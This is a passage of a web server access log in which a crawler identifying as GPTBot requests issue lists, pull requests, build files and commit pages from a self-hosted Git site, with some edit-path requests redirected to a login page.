"https://git.hanmocnn.co.kr/windpacer/windpacer/issues?project=-1&state=open&type=all" -[17/Feb/2026:18:41:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=open&type=all" [Client 74.7.227.38] [Length 9990] [Gzip 3.53] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:42:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28none%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=open&type=all" -[17/Feb/2026:18:42:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 11807] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" -[17/Feb/2026:18:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 11992] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj" -[17/Feb/2026:18:42:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10932] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/0e583fb1c388c335fdaaff550f7c3bbed06ac0f2/PythonTest/import%20sys.py" -[17/Feb/2026:18:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/issues?assignee=%28none%29&project=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 10142] [Gzip 3.49] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/issues?assignee=%28none%29&project=-1&state=all&type=all" -[17/Feb/2026:18:42:02 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&sort=latest&state=all&type=all" [Client 74.7.227.38] [Length 9987] [Gzip 3.54] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?assignee=%28any%29&milestone=-1&state=all&type=all" -[17/Feb/2026:18:42:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py?display=rendered" [Client 74.7.227.38] [Length 10931] [Gzip 2.97] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/1e9914ec7e24cf3d671b5cdf6c85cd3cbad7bbe8/PythonTest/import%20sys.py" -[17/Feb/2026:18:42:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10224] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=oldest&state=open&type=all" -[17/Feb/2026:18:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=closed&type=all" [Client 74.7.227.38] [Length 10261] [Gzip 3.51] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/issues?assignee=1&labels=0&project=-1&sort=oldest&state=closed&type=all" -[17/Feb/2026:18:42:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10227] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/issues?assignee=1&labels=0&milestone=-1&project=-1&state=open&type=all" -[17/Feb/2026:18:42:05 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/homepage/_diffpatch/main/.Backup/html/index.html" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/blame/branch/main/.Backup/html/index.html" -[17/Feb/2026:18:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/_diffpatch/main/.Backup/html/index.html" -[17/Feb/2026:18:42:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake?display=rendered" [Client 74.7.227.38] [Length 11026] [Gzip 3.05] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/industrial-comm/build/cmake_install.cmake" -[17/Feb/2026:18:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 9842] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[17/Feb/2026:18:42:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets?display=source" [Client 74.7.227.38] [Length 11823] [Gzip 3.21] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[17/Feb/2026:18:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 1112] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[17/Feb/2026:18:42:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props?display=rendered" [Client 74.7.227.38] [Length 11172] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[17/Feb/2026:18:42:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets?display=rendered" [Client 74.7.227.38] [Length 11175] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[17/Feb/2026:18:42:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props?display=source" [Client 74.7.227.38] [Length 12012] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[17/Feb/2026:18:42:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 10851] [Gzip 3.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[17/Feb/2026:18:42:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/commits/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 9841] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[17/Feb/2026:18:42:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/raw/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 1084] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[17/Feb/2026:18:42:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/blame/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 11119] [Gzip 3.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[17/Feb/2026:18:42:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" [Client 74.7.227.38] [Length 967] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.props" -[17/Feb/2026:18:42:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/rss/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 971] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[17/Feb/2026:18:42:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" -[17/Feb/2026:18:42:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commit/e54b4e832455afb83987fc146872a66900dee5c0?files=C%2b%2bProject%2findustrial-comm%2fbuild%2fcpp%2fCMakeFiles%2fcomm_core.dir%2fsrc%2fcodec.cpp.o" [Client 74.7.227.38] [Length 24215] [Gzip 4.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/commits/commit/e54b4e832455afb83987fc146872a66900dee5c0/C++Project/industrial-comm/build/cpp/CMakeFiles/comm_core.dir/src/codec.cpp.o" -[17/Feb/2026:18:42:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/pulls?project=-1&sort=farduedate&state=open&type=all" [Client 74.7.227.38] [Length 10006] [Gzip 3.50] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/pulls?sort=farduedate&state=open&type=all" -[17/Feb/2026:18:42:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/pulls?assignee=%28any%29&project=-1&state=open&type=all" [Client 74.7.227.38] [Length 10002] [Gzip 3.52] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/pulls?project=-1&state=open&type=all" -[17/Feb/2026:18:42:14 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" [Client 74.7.227.38] [Length 10640] [Gzip 3.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol" -[17/Feb/2026:18:42:15 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/src/branch/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[17/Feb/2026:18:42:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/dbserver/_delete/main/OpcConnectionTest/obj/OpcConnectionTest.csproj.nuget.g.targets" -[17/Feb/2026:18:42:15 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 21827] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" -[17/Feb/2026:18:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html?display=rendered" [Client 74.7.227.38] [Length 10907] [Gzip 2.98] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/.Backup/html/index.html" -[17/Feb/2026:18:42:16 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html?display=source" [Client 74.7.227.38] [Length 21826] [Gzip 6.72] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/6e9a7ed81bf6cf5e1946c5d7db1ffbaf9639424d/.Backup/html/index.html" -[17/Feb/2026:18:42:17 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=source" [Client 74.7.227.38] [Length 11229] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts?display=source" [Client 74.7.227.38] [Length 11322] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/compiler_depend.ts" -[17/Feb/2026:18:42:18 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make?display=rendered" [Client 74.7.227.38] [Length 11089] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/progress.make" -[17/Feb/2026:18:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=source" [Client 74.7.227.38] [Length 11233] [Gzip 3.07] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:42:19 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make?display=rendered" [Client 74.7.227.38] [Length 11081] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/flags.make" -[17/Feb/2026:18:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake?display=source" [Client 74.7.227.38] [Length 11615] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/cmake_clean.cmake" -[17/Feb/2026:18:42:20 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_upload/main/PostgresPatrol/build/PostgresPatrol/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" -[17/Feb/2026:18:42:20 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_upload/main/PostgresPatrol/build/PostgresPatrol/localpycs" -[17/Feb/2026:18:42:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" -[17/Feb/2026:18:42:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_diffpatch/main/PostgresPatrol/build/PostgresPatrol/localpycs" -[17/Feb/2026:18:42:21 +0000] - 303 303 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/localpycs" [Client 74.7.227.38] [Length 38] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" -[17/Feb/2026:18:42:21 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/user/login" [Client 74.7.227.38] [Length 4850] [Gzip 2.41] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/_new/main/PostgresPatrol/build/PostgresPatrol/localpycs" -[17/Feb/2026:18:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" [Client 74.7.227.38] [Length 9864] [Gzip 2.88] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" -[17/Feb/2026:18:42:22 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod04_pywin32.pyc" [Client 74.7.227.38] [Length 11158] [Gzip 3.08] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" -[17/Feb/2026:18:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs/pyimod02_importers.pyc" [Client 74.7.227.38] [Length 11157] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/branch/main/PostgresPatrol/build/PostgresPatrol/localpycs" -[17/Feb/2026:18:42:23 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=source" [Client 74.7.227.38] [Length 15272] [Gzip 4.80] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make?display=rendered" [Client 74.7.227.38] [Length 11085] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/build.make" -[17/Feb/2026:18:42:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make?display=rendered" [Client 74.7.227.38] [Length 11082] [Gzip 3.09] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/b5cff16c16c89165fbeab6bb0b379c0cfafcce7a/C++Project/TestProject/build/CMakeFiles/TestApp.dir/depend.make" -[17/Feb/2026:18:42:25 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/issues?assignee=%28none%29&sort=oldest&state=open&type=all" [Client 74.7.227.38] [Length 10177] [Gzip 